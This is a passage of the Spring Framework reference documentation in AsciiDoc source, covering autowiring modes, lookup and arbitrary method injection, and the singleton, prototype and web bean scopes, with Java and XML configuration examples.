-->\n\t<\/beans>\n----\n\n\n\n[[beans-factory-autowire]]\n=== Autowiring collaborators\n\nThe Spring container can __autowire__ relationships between collaborating beans. You can\nallow Spring to resolve collaborators (other beans) automatically for your bean by\ninspecting the contents of the `ApplicationContext`. Autowiring has the following\nadvantages:\n\n* Autowiring can significantly reduce the need to specify properties or constructor\n arguments. (Other mechanisms such as a bean template\n <<beans-child-bean-definitions,discussed elsewhere in this chapter>> are also valuable\n in this regard.)\n* Autowiring can update a configuration as your objects evolve. For example, if you need\n to add a dependency to a class, that dependency can be satisfied automatically without\n you needing to modify the configuration. Thus autowiring can be especially useful\n during development, without negating the option of switching to explicit wiring when\n the code base becomes more stable.\n\nWhen using XML-based configuration metadata footnote:[See\npass:specialcharacters,macros[<<beans-factory-collaborators>>]], you specify autowire\nmode for a bean definition with the `autowire` attribute of the `<bean\/>` element. The\nautowiring functionality has four modes. You specify autowiring __per__ bean and thus\ncan choose which ones to autowire.\n\n[[beans-factory-autowiring-modes-tbl]]\n.Autowiring modes\n|===\n| Mode| Explanation\n\n| no\n| (Default) No autowiring. Bean references must be defined via a `ref` element. Changing\n the default setting is not recommended for larger deployments, because specifying\n collaborators explicitly gives greater control and clarity. To some extent, it\n documents the structure of a system.\n\n| byName\n| Autowiring by property name. Spring looks for a bean with the same name as the\n property that needs to be autowired. For example, if a bean definition is set to\n autowire by name, and it contains a __master__ property (that is, it has a\n __setMaster(..)__ method), Spring looks for a bean definition named `master`, and uses\n it to set the property.\n\n| byType\n| Allows a property to be autowired if exactly one bean of the property type exists in\n the container. If more than one exists, a fatal exception is thrown, which indicates\n that you may not use __byType__ autowiring for that bean. If there are no matching\n beans, nothing happens; the property is not set.\n\n| constructor\n| Analogous to __byType__, but applies to constructor arguments. If there is not exactly\n one bean of the constructor argument type in the container, a fatal error is raised.\n|===\n\nWith __byType__ or __constructor__ autowiring mode, you can wire arrays and\ntyped collections. In such cases __all__ autowire candidates within the container that\nmatch the expected type are provided to satisfy the dependency. You can autowire\nstrongly-typed `Map` instances if the expected key type is `String`. The values of an\nautowired `Map` consist of all bean instances that match the expected type, and the\nkeys of the `Map` contain the corresponding bean names.\n\nYou can combine autowire behavior with dependency checking, which is performed after\nautowiring completes.\n\n\n[[beans-autowired-exceptions]]\n==== Limitations and disadvantages of autowiring\n\nAutowiring works best when it is used consistently across a project. 
If autowiring is\nnot used in general, it might be confusing to developers to use it to wire only one or\ntwo bean definitions.\n\nConsider the limitations and disadvantages of autowiring:\n\n* Explicit dependencies in `property` and `constructor-arg` settings always override\n autowiring. You cannot autowire so-called __simple__ properties such as primitives,\n `Strings`, and `Classes` (and arrays of such simple properties). This limitation is\n by design.\n* Autowiring is less exact than explicit wiring. Although, as noted in the above table,\n Spring is careful to avoid guessing in case of ambiguity that might have unexpected\n results, the relationships between your Spring-managed objects are no longer\n documented explicitly.\n* Wiring information may not be available to tools that may generate documentation from\n a Spring container.\n* Multiple bean definitions within the container may match the type specified by the\n setter method or constructor argument to be autowired. For arrays, collections, or\n Maps, this is not necessarily a problem. However, for dependencies that expect a single\n value, this ambiguity is not arbitrarily resolved. If no unique bean definition is\n available, an exception is thrown.\n\nIn the latter scenario, you have several options:\n\n* Abandon autowiring in favor of explicit wiring.\n* Avoid autowiring for a bean definition by setting its `autowire-candidate` attribute\n to `false` as described in the next section.\n* Designate a single bean definition as the __primary__ candidate by setting the\n `primary` attribute of its `<bean\/>` element to `true`.\n* Implement the more fine-grained control available\n with annotation-based configuration, as described in <<beans-annotation-config>>.\n\n\n[[beans-factory-autowire-candidate]]\n==== Excluding a bean from autowiring\n\nOn a per-bean basis, you can exclude a bean from autowiring. In Spring's XML format, set\nthe `autowire-candidate` attribute of the `<bean\/>` element to `false`; the container\nmakes that specific bean definition unavailable to the autowiring infrastructure\n(including annotation style configurations such as <<beans-autowired-annotation,\n`@Autowired`>>).\n\nYou can also limit autowire candidates based on pattern-matching against bean names. The\ntop-level `<beans\/>` element accepts one or more patterns within its\n`default-autowire-candidates` attribute. For example, to limit autowire candidate status\nto any bean whose name ends with __Repository__, provide a value of `*Repository`. To\nprovide multiple patterns, define them in a comma-separated list. An explicit value of\n`true` or `false` for a bean definition's `autowire-candidate` attribute always takes\nprecedence, and for such beans, the pattern matching rules do not apply.\n\nThese techniques are useful for beans that you never want to be injected into other\nbeans by autowiring. This does not mean that an excluded bean cannot itself be configured\nusing autowiring. Rather, the bean itself is not a candidate for autowiring other beans.\n\n\n\n\n[[beans-factory-method-injection]]\n=== Method injection\n\nIn most application scenarios, most beans in the container are\n<<beans-factory-scopes-singleton,singletons>>. When a singleton bean needs to\ncollaborate with another singleton bean, or a non-singleton bean needs to collaborate\nwith another non-singleton bean, you typically handle the dependency by defining one\nbean as a property of the other. A problem arises when the bean lifecycles are\ndifferent. 
Suppose singleton bean A needs to use non-singleton (prototype) bean B,\nperhaps on each method invocation on A. The container only creates the singleton bean A\nonce, and thus only gets one opportunity to set the properties. The container cannot\nprovide bean A with a new instance of bean B every time one is needed.\n\nA solution is to forgo some inversion of control. You can <<beans-factory-aware,make\nbean A aware of the container>> by implementing the `ApplicationContextAware` interface,\nand by <<beans-factory-client,making a getBean(\"B\") call to the container>> asking for a\n(typically new) bean B instance every time bean A needs it. The following is an example\nof this approach:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/\/ a class that uses a stateful Command-style class to perform some processing\n\tpackage fiona.apple;\n\n\timport java.util.Map;\n\n\t\/\/ Spring-API imports\n\timport org.springframework.beans.BeansException;\n\timport org.springframework.context.ApplicationContext;\n\timport org.springframework.context.ApplicationContextAware;\n\n\tpublic class CommandManager implements ApplicationContextAware {\n\n\t\tprivate ApplicationContext applicationContext;\n\n\t\tpublic Object process(Map commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\tprotected Command createCommand() {\n\t\t\t\/\/ notice the Spring API dependency!\n\t\t\treturn this.applicationContext.getBean(\"command\", Command.class);\n\t\t}\n\n\t\tpublic void setApplicationContext(\n\t\t\t\tApplicationContext applicationContext) throws BeansException {\n\t\t\tthis.applicationContext = applicationContext;\n\t\t}\n\t}\n----\n\nThe preceding is not desirable, because the business code is aware of and coupled to the\nSpring Framework. Method Injection, a somewhat advanced feature of the Spring IoC\ncontainer, allows this use case to be handled in a clean fashion.\n\n****\nYou can read more about the motivation for Method Injection in\nhttps:\/\/spring.io\/blog\/2004\/08\/06\/method-injection\/[this blog entry].\n****\n\n\n[[beans-factory-lookup-method-injection]]\n==== Lookup method injection\n\nLookup method injection is the ability of the container to override methods on\n__container managed beans__, to return the lookup result for another named bean in the\ncontainer. The lookup typically involves a prototype bean as in the scenario described\nin the preceding section. 
The Spring Framework implements this method injection by using\nbytecode generation from the CGLIB library to generate dynamically a subclass that\noverrides the method.\n\n[NOTE]\n====\n* For this dynamic subclassing to work, the class that the Spring bean container will\n subclass cannot be `final`, and the method to be overridden cannot be `final` either.\n* Unit-testing a class that has an `abstract` method requires you to subclass the class\n yourself and to supply a stub implementation of the `abstract` method.\n* Concrete methods are also necessary for component scanning which requires concrete\n classes to pick up.\n* A further key limitation is that lookup methods won't work with factory methods and\n in particular not with `@Bean` methods in configuration classes, since the container\n is not in charge of creating the instance in that case and therefore cannot create\n a runtime-generated subclass on the fly.\n====\n\nLooking at the `CommandManager` class in the previous code snippet, you see that the\nSpring container will dynamically override the implementation of the `createCommand()`\nmethod. Your `CommandManager` class will not have any Spring dependencies, as can be\nseen in the reworked example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage fiona.apple;\n\n\t\/\/ no more Spring imports!\n\n\tpublic abstract class CommandManager {\n\n\t\tpublic Object process(Object commandState) {\n\t\t\t\/\/ grab a new instance of the appropriate Command interface\n\t\t\tCommand command = createCommand();\n\t\t\t\/\/ set the state on the (hopefully brand new) Command instance\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t\/\/ okay... but where is the implementation of this method?\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nIn the client class containing the method to be injected (the `CommandManager` in this\ncase), the method to be injected requires a signature of the following form:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<public|protected> [abstract] <return-type> theMethodName(no-arguments);\n----\n\nIf the method is `abstract`, the dynamically-generated subclass implements the method.\nOtherwise, the dynamically-generated subclass overrides the concrete method defined in\nthe original class. For example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- a stateful bean deployed as a prototype (non-singleton) -->\n\t<bean id=\"myCommand\" class=\"fiona.apple.AsyncCommand\" scope=\"prototype\">\n\t\t<!-- inject dependencies here as required -->\n\t<\/bean>\n\n\t<!-- commandProcessor uses statefulCommandHelper -->\n\t<bean id=\"commandManager\" class=\"fiona.apple.CommandManager\">\n\t\t<lookup-method name=\"createCommand\" bean=\"myCommand\"\/>\n\t<\/bean>\n----\n\nThe bean identified as __commandManager__ calls its own method `createCommand()`\nwhenever it needs a new instance of the __myCommand__ bean. You must be careful to deploy\nthe `myCommand` bean as a prototype, if that is actually what is needed. 
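\n\nTo make the effect concrete, here is a minimal usage sketch. The `commands.xml` file\nname is an assumption for this illustration, and `Command` is presumed to have a\nconcrete implementation behind the `myCommand` bean definition shown above:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"commands.xml\");\n\tCommandManager manager = ctx.getBean(\"commandManager\", CommandManager.class);\n\n\t\/\/ each process(..) call goes through createCommand(), which the container\n\t\/\/ overrides to return a fresh prototype-scoped myCommand instance\n\tObject firstResult = manager.process(\"state-1\");\n\tObject secondResult = manager.process(\"state-2\");\n----\n\n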
If the `myCommand` bean is instead deployed\nas a <<beans-factory-scopes-singleton,singleton>>, the same instance of the `myCommand`\nbean is returned each time.\n\nAlternatively, within the annotation-based component model, you may declare a lookup\nmethod through the `@Lookup` annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\n\t\tpublic Object process(Object commandState) {\n\t\t\tCommand command = createCommand();\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t@Lookup(\"myCommand\")\n\t\tprotected abstract Command createCommand();\n\t}\n----\n\nOr, more idiomatically, you may rely on the target bean getting resolved against the\ndeclared return type of the lookup method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic abstract class CommandManager {\n\n\t\tpublic Object process(Object commandState) {\n\t\t\tMyCommand command = createCommand();\n\t\t\tcommand.setState(commandState);\n\t\t\treturn command.execute();\n\t\t}\n\n\t\t@Lookup\n\t\tprotected abstract MyCommand createCommand();\n\t}\n----\n\nNote that you will typically declare such annotated lookup methods with a concrete\nstub implementation, in order for them to be compatible with Spring's component\nscanning rules where abstract classes get ignored by default. This limitation does not\napply in the case of explicitly registered or explicitly imported bean classes.\n\n[TIP]\n====\nAnother way of accessing differently scoped target beans is an `ObjectFactory`\/\n`Provider` injection point. Check out <<beans-factory-scopes-other-injection>>.\n\nThe interested reader may also find the `ServiceLocatorFactoryBean` (in the\n`org.springframework.beans.factory.config` package) to be of use.\n====\n\n\n[[beans-factory-arbitrary-method-replacement]]\n==== Arbitrary method replacement\n\nA less useful form of method injection than lookup method injection is the ability to\nreplace arbitrary methods in a managed bean with another method implementation. Users\nmay safely skip the rest of this section until the functionality is actually needed.\n\nWith XML-based configuration metadata, you can use the `replaced-method` element to\nreplace an existing method implementation with another, for a deployed bean. 
Consider\nthe following class, with a method `computeValue`, which we want to override:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MyValueCalculator {\n\n\t\tpublic String computeValue(String input) {\n\t\t\t\/\/ some real code...\n\t\t}\n\n\t\t\/\/ some other methods...\n\n\t}\n----\n\nA class implementing the `org.springframework.beans.factory.support.MethodReplacer`\ninterface provides the new method definition.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t\/**\n\t * meant to be used to override the existing computeValue(String)\n\t * implementation in MyValueCalculator\n\t *\/\n\tpublic class ReplacementComputeValue implements MethodReplacer {\n\n\t\tpublic Object reimplement(Object o, Method m, Object[] args) throws Throwable {\n\t\t\t\/\/ get the input value, work with it, and return a computed result\n\t\t\tString input = (String) args[0];\n\t\t\t...\n\t\t\treturn ...;\n\t\t}\n\t}\n----\n\nThe bean definition to deploy the original class and specify the method override would\nlook like this:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"myValueCalculator\" class=\"x.y.z.MyValueCalculator\">\n\t\t<!-- arbitrary method replacement -->\n\t\t<replaced-method name=\"computeValue\" replacer=\"replacementComputeValue\">\n\t\t\t<arg-type>String<\/arg-type>\n\t\t<\/replaced-method>\n\t<\/bean>\n\n\t<bean id=\"replacementComputeValue\" class=\"a.b.c.ReplacementComputeValue\"\/>\n----\n\nYou can use one or more contained `<arg-type\/>` elements within the `<replaced-method\/>`\nelement to indicate the method signature of the method being overridden. The signature\nfor the arguments is necessary only if the method is overloaded and multiple variants\nexist within the class. For convenience, the type string for an argument may be a\nsubstring of the fully qualified type name. For example, the following all match\n`java.lang.String`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tjava.lang.String\n\tString\n\tStr\n----\n\nBecause the number of arguments is often enough to distinguish between each possible\nchoice, this shortcut can save a lot of typing by allowing you to type only the\nshortest string that will match an argument type.\n\n\n\n\n[[beans-factory-scopes]]\n== Bean scopes\n\nWhen you create a bean definition, you create a __recipe__ for creating actual instances\nof the class defined by that bean definition. The idea that a bean definition is a\nrecipe is important, because it means that, as with a class, you can create many object\ninstances from a single recipe.\n\nYou can control not only the various dependencies and configuration values that are to\nbe plugged into an object that is created from a particular bean definition, but also\nthe __scope__ of the objects created from a particular bean definition. This approach is\npowerful and flexible in that you can __choose__ the scope of the objects you create\nthrough configuration instead of having to bake in the scope of an object at the Java\nclass level. Beans can be defined to be deployed in one of a number of scopes: out of\nthe box, the Spring Framework supports six scopes, four of which are available only if\nyou use a web-aware `ApplicationContext`.\n\nThe following scopes are supported out of the box. 
You can also create\n<<beans-factory-scopes-custom,a custom scope.>>\n\n[[beans-factory-scopes-tbl]]\n.Bean scopes\n|===\n| Scope| Description\n\n| <<beans-factory-scopes-singleton,singleton>>\n| (Default) Scopes a single bean definition to a single object instance per Spring IoC\n container.\n\n| <<beans-factory-scopes-prototype,prototype>>\n| Scopes a single bean definition to any number of object instances.\n\n| <<beans-factory-scopes-request,request>>\n| Scopes a single bean definition to the lifecycle of a single HTTP request; that is,\n each HTTP request has its own instance of a bean created off the back of a single bean\n definition. Only valid in the context of a web-aware Spring `ApplicationContext`.\n\n| <<beans-factory-scopes-session,session>>\n| Scopes a single bean definition to the lifecycle of an HTTP `Session`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n\n| <<beans-factory-scopes-application,application>>\n| Scopes a single bean definition to the lifecycle of a `ServletContext`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n\n| <<websocket-stomp-websocket-scope,websocket>>\n| Scopes a single bean definition to the lifecycle of a `WebSocket`. Only valid in\n the context of a web-aware Spring `ApplicationContext`.\n|===\n\n[NOTE]\n====\nAs of Spring 3.0, a __thread scope__ is available, but is not registered by default. For\nmore information, see the documentation for\n{api-spring-framework}\/context\/support\/SimpleThreadScope.html[`SimpleThreadScope`].\nFor instructions on how to register this or any other custom scope, see\n<<beans-factory-scopes-custom-using>>.\n====\n\n\n\n[[beans-factory-scopes-singleton]]\n=== The singleton scope\n\nOnly one __shared__ instance of a singleton bean is managed, and all requests for beans\nwith an id or ids matching that bean definition result in that one specific bean\ninstance being returned by the Spring container.\n\nTo put it another way, when you define a bean definition and it is scoped as a\nsingleton, the Spring IoC container creates __exactly one__ instance of the object\ndefined by that bean definition. This single instance is stored in a cache of such\nsingleton beans, and __all subsequent requests and references__ for that named bean\nreturn the cached object.\n\nimage::images\/singleton.png[width=400]\n\nSpring's concept of a singleton bean differs from the Singleton pattern as defined in\nthe Gang of Four (GoF) patterns book. The GoF Singleton hard-codes the scope of an\nobject such that one __and only one__ instance of a particular class is created __per\nClassLoader__. The scope of the Spring singleton is best described as __per container\nand per bean__. This means that if you define one bean for a particular class in a\nsingle Spring container, then the Spring container creates one __and only one__ instance\nof the class defined by that bean definition. __The singleton scope is the default scope\nin Spring__. 
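\n\nAs an informal illustration of this contract, two lookups of the `accountService` bean\ndefined below return the very same object (the `services.xml` file name is an\nassumption for this sketch):\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tApplicationContext ctx = new ClassPathXmlApplicationContext(\"services.xml\");\n\n\t\/\/ both lookups resolve to the single cached instance managed by this container\n\tDefaultAccountService first = ctx.getBean(\"accountService\", DefaultAccountService.class);\n\tDefaultAccountService second = ctx.getBean(\"accountService\", DefaultAccountService.class);\n\tSystem.out.println(first == second); \/\/ true for a singleton-scoped bean\n----\n\n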
To define a bean as a singleton in XML, you would write, for example:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"com.foo.DefaultAccountService\"\/>\n\n\t<!-- the following is equivalent, though redundant (singleton scope is the default) -->\n\t<bean id=\"accountService\" class=\"com.foo.DefaultAccountService\" scope=\"singleton\"\/>\n----\n\n\n\n[[beans-factory-scopes-prototype]]\n=== The prototype scope\n\nThe non-singleton, prototype scope of bean deployment results in the __creation of a new\nbean instance__ every time a request for that specific bean is made. A request, in this\nsense, is made whenever the bean is injected into another bean or you request it through\na `getBean()` method call on the container. As a rule, use the prototype scope for all\nstateful beans and the singleton scope for stateless beans.\n\nThe following diagram illustrates the Spring prototype scope. __A data access object\n(DAO) is not typically configured as a prototype, because a typical DAO does not hold\nany conversational state; it was just easier for this author to reuse the core of the\nsingleton diagram.__\n\nimage::images\/prototype.png[width=400]\n\nThe following example defines a bean as a prototype in XML:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"accountService\" class=\"com.foo.DefaultAccountService\" scope=\"prototype\"\/>\n----\n\nIn contrast to the other scopes, Spring does not manage the complete lifecycle of a\nprototype bean: the container instantiates, configures, and otherwise assembles a\nprototype object, and hands it to the client, with no further record of that prototype\ninstance. Thus, although __initialization__ lifecycle callback methods are called on all\nobjects regardless of scope, in the case of prototypes, configured __destruction__\nlifecycle callbacks are __not__ called. The client code must clean up prototype-scoped\nobjects and release expensive resources that the prototype bean(s) are holding. To get\nthe Spring container to release resources held by prototype-scoped beans, try using a\ncustom <<beans-factory-extension-bpp,bean post-processor>>, which holds a reference to\nbeans that need to be cleaned up.\n\nIn some respects, the Spring container's role in regard to a prototype-scoped bean is a\nreplacement for the Java `new` operator. All lifecycle management past that point must\nbe handled by the client. (For details on the lifecycle of a bean in the Spring\ncontainer, see <<beans-factory-lifecycle>>.)\n\n\n\n[[beans-factory-scopes-sing-prot-interaction]]\n=== Singleton beans with prototype-bean dependencies\n\nWhen you use singleton-scoped beans with dependencies on prototype beans, be aware that\n__dependencies are resolved at instantiation time__. Thus if you dependency-inject a\nprototype-scoped bean into a singleton-scoped bean, a new prototype bean is instantiated\nand then dependency-injected into the singleton bean. The prototype instance is the sole\ninstance that is ever supplied to the singleton-scoped bean.\n\nHowever, suppose you want the singleton-scoped bean to acquire a new instance of the\nprototype-scoped bean repeatedly at runtime. You cannot dependency-inject a\nprototype-scoped bean into your singleton bean, because that injection occurs only\n__once__, when the Spring container is instantiating the singleton bean and resolving\nand injecting its dependencies. 
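\n\nOne lifecycle-safe alternative, sketched here under assumed names (`ReportGenerator`\nand `Report` are hypothetical, with `ReportGenerator` presumed to be a prototype-scoped\nbean), is to inject an `ObjectFactory` and ask it for a fresh instance on each use; see\n<<beans-factory-scopes-other-injection>>:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class ReportService {\n\n\t\t\/\/ each getObject() call asks the container for a new instance\n\t\t\/\/ of the prototype-scoped ReportGenerator bean\n\t\t@Autowired\n\t\tprivate ObjectFactory<ReportGenerator> generatorFactory;\n\n\t\tpublic Report runReport() {\n\t\t\tReportGenerator generator = this.generatorFactory.getObject();\n\t\t\treturn generator.generate();\n\t\t}\n\t}\n----\n\n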
If you need a new instance of a prototype bean at\nruntime more than once, see <<beans-factory-method-injection>>\n\n\n\n[[beans-factory-scopes-other]]\n=== Request, session, application, and WebSocket scopes\n\nThe `request`, `session`, `application`, and `websocket` scopes are __only__ available\nif you use a web-aware Spring `ApplicationContext` implementation (such as\n`XmlWebApplicationContext`). If you use these scopes with regular Spring IoC containers\nsuch as the `ClassPathXmlApplicationContext`, an `IllegalStateException` will be thrown\ncomplaining about an unknown bean scope.\n\n\n[[beans-factory-scopes-other-web-configuration]]\n==== Initial web configuration\n\nTo support the scoping of beans at the `request`, `session`, `application`, and\n`websocket` levels (web-scoped beans), some minor initial configuration is\nrequired before you define your beans. (This initial setup is __not__ required\nfor the standard scopes, `singleton` and `prototype`.)\n\nHow you accomplish this initial setup depends on your particular Servlet environment.\n\nIf you access scoped beans within Spring Web MVC, in effect, within a request that is\nprocessed by the Spring `DispatcherServlet`, then no special setup is necessary:\n`DispatcherServlet` already exposes all relevant state.\n\nIf you use a Servlet 2.5 web container, with requests processed outside of Spring's\n`DispatcherServlet` (for example, when using JSF or Struts), you need to register the\n`org.springframework.web.context.request.RequestContextListener` `ServletRequestListener`.\nFor Servlet 3.0+, this can be done programmatically via the `WebApplicationInitializer`\ninterface. Alternatively, or for older containers, add the following declaration to\nyour web application's `web.xml` file:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t...\n\t\t<listener>\n\t\t\t<listener-class>\n\t\t\t\torg.springframework.web.context.request.RequestContextListener\n\t\t\t<\/listener-class>\n\t\t<\/listener>\n\t\t...\n\t<\/web-app>\n----\n\nAlternatively, if there are issues with your listener setup, consider using Spring's\n`RequestContextFilter`. The filter mapping depends on the surrounding web\napplication configuration, so you have to change it as appropriate.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<web-app>\n\t\t...\n\t\t<filter>\n\t\t\t<filter-name>requestContextFilter<\/filter-name>\n\t\t\t<filter-class>org.springframework.web.filter.RequestContextFilter<\/filter-class>\n\t\t<\/filter>\n\t\t<filter-mapping>\n\t\t\t<filter-name>requestContextFilter<\/filter-name>\n\t\t\t<url-pattern>\/*<\/url-pattern>\n\t\t<\/filter-mapping>\n\t\t...\n\t<\/web-app>\n----\n\n`DispatcherServlet`, `RequestContextListener`, and `RequestContextFilter` all do exactly\nthe same thing, namely bind the HTTP request object to the `Thread` that is servicing\nthat request. This makes beans that are request- and session-scoped available further\ndown the call chain.\n\n\n[[beans-factory-scopes-request]]\n==== Request scope\n\nConsider the following XML configuration for a bean definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"loginAction\" class=\"com.foo.LoginAction\" scope=\"request\"\/>\n----\n\nThe Spring container creates a new instance of the `LoginAction` bean by using the\n`loginAction` bean definition for each and every HTTP request. That is, the\n`loginAction` bean is scoped at the HTTP request level. 
You can change the internal\nstate of the instance that is created as much as you want, because other instances\ncreated from the same `loginAction` bean definition will not see these changes in state;\nthey are particular to an individual request. When the request completes processing, the\nbean that is scoped to the request is discarded.\n\nWhen using annotation-driven components or Java Config, the `@RequestScope` annotation\ncan be used to assign a component to the `request` scope.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@RequestScope**\n\t@Component\n\tpublic class LoginAction {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[beans-factory-scopes-session]]\n==== Session scope\n\nConsider the following XML configuration for a bean definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\"\/>\n----\n\nThe Spring container creates a new instance of the `UserPreferences` bean by using the\n`userPreferences` bean definition for the lifetime of a single HTTP `Session`. In other\nwords, the `userPreferences` bean is effectively scoped at the HTTP `Session` level. As\nwith request-scoped beans, you can change the internal state of the instance that is\ncreated as much as you want, knowing that other HTTP `Session` instances that are also\nusing instances created from the same `userPreferences` bean definition do not see these\nchanges in state, because they are particular to an individual HTTP `Session`. When the\nHTTP `Session` is eventually discarded, the bean that is scoped to that particular HTTP\n`Session` is also discarded.\n\nWhen using annotation-driven components or Java Config, the `@SessionScope` annotation\ncan be used to assign a component to the `session` scope.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@SessionScope**\n\t@Component\n\tpublic class UserPreferences {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[beans-factory-scopes-application]]\n==== Application scope\n\nConsider the following XML configuration for a bean definition:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<bean id=\"appPreferences\" class=\"com.foo.AppPreferences\" scope=\"application\"\/>\n----\n\nThe Spring container creates a new instance of the `AppPreferences` bean by using the\n`appPreferences` bean definition once for the entire web application. That is, the\n`appPreferences` bean is scoped at the `ServletContext` level, stored as a regular\n`ServletContext` attribute. This is somewhat similar to a Spring singleton bean but\ndiffers in two important ways: it is a singleton per `ServletContext`, not per Spring\n`ApplicationContext` (of which there may be several in any given web application),\nand it is actually exposed and therefore visible as a `ServletContext` attribute.\n\nWhen using annotation-driven components or Java Config, the `@ApplicationScope`\nannotation can be used to assign a component to the `application` scope.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t**@ApplicationScope**\n\t@Component\n\tpublic class AppPreferences {\n\t\t\/\/ ...\n\t}\n----\n\n\n[[beans-factory-scopes-other-injection]]\n==== Scoped beans as dependencies\n\nThe Spring IoC container manages not only the instantiation of your objects (beans),\nbut also the wiring up of collaborators (or dependencies). 
If you want to inject (for\nexample) an HTTP request scoped bean into another bean of a longer-lived scope, you may\nchoose to inject an AOP proxy in place of the scoped bean. That is, you need to inject\na proxy object that exposes the same public interface as the scoped object but that can\nalso retrieve the real target object from the relevant scope (such as an HTTP request)\nand delegate method calls onto the real object.\n\n[NOTE]\n====\nYou may also use `<aop:scoped-proxy\/>` between beans that are scoped as `singleton`,\nwith the reference then going through an intermediate proxy that is serializable\nand therefore able to re-obtain the target singleton bean on deserialization.\n\nWhen declaring `<aop:scoped-proxy\/>` against a bean of scope `prototype`, every method\ncall on the shared proxy will lead to the creation of a new target instance which the\ncall is then being forwarded to.\n\nAlso, scoped proxies are not the only way to access beans from shorter scopes in a\nlifecycle-safe fashion. You may also simply declare your injection point (i.e. the\nconstructor\/setter argument or autowired field) as `ObjectFactory<MyTargetBean>`,\nallowing for a `getObject()` call to retrieve the current instance on demand every\ntime it is needed - without holding on to the instance or storing it separately.\n\nAs an extended variant, you may declare `ObjectProvider<MyTargetBean>` which delivers\nseveral additional access variants, including `getIfAvailable` and `getIfUnique`.\n\nThe JSR-330 variant of this is called `Provider`, used with a `Provider<MyTargetBean>`\ndeclaration and a corresponding `get()` call for every retrieval attempt.\nSee <<beans-standard-annotations,here>> for more details on JSR-330 overall.\n====\n\nThe configuration in the following example is only one line, but it is important to\nunderstand the \"why\" as well as the \"how\" behind it.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:aop=\"http:\/\/www.springframework.org\/schema\/aop\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\n\t\t\thttp:\/\/www.springframework.org\/schema\/aop\/spring-aop.xsd\">\n\n\t\t<!-- an HTTP Session-scoped bean exposed as a proxy -->\n\t\t<bean id=\"userPreferences\" class=\"com.foo.UserPreferences\" scope=\"session\">\n\t\t\t<!-- instructs the container to proxy the surrounding bean -->\n\t\t\t<aop:scoped-proxy\/>\n\t\t<\/bean>\n\n\t\t<!-- a singleton-scoped bean injected with a proxy to the above bean -->\n\t\t<bean id=\"userService\" class=\"com.foo.SimpleUserService\">\n\t\t\t<!-- a reference to the proxied userPreferences bean -->\n\t\t\t<property name=\"userPreferences\" ref=\"userPreferences\"\/>\n\t\t<\/bean>\n\t<\/beans>\n----\n\nTo create such a proxy, you insert a child `<aop:scoped-proxy\/>` element into a scoped\nbean definition (see <<beans-factory-scopes-other-injection-proxies>> and\n<<xsd-configuration>>). Why do definitions of beans scoped at the `request`, `session`\nand custom-scope levels require the `<aop:scoped-proxy\/>` element? 
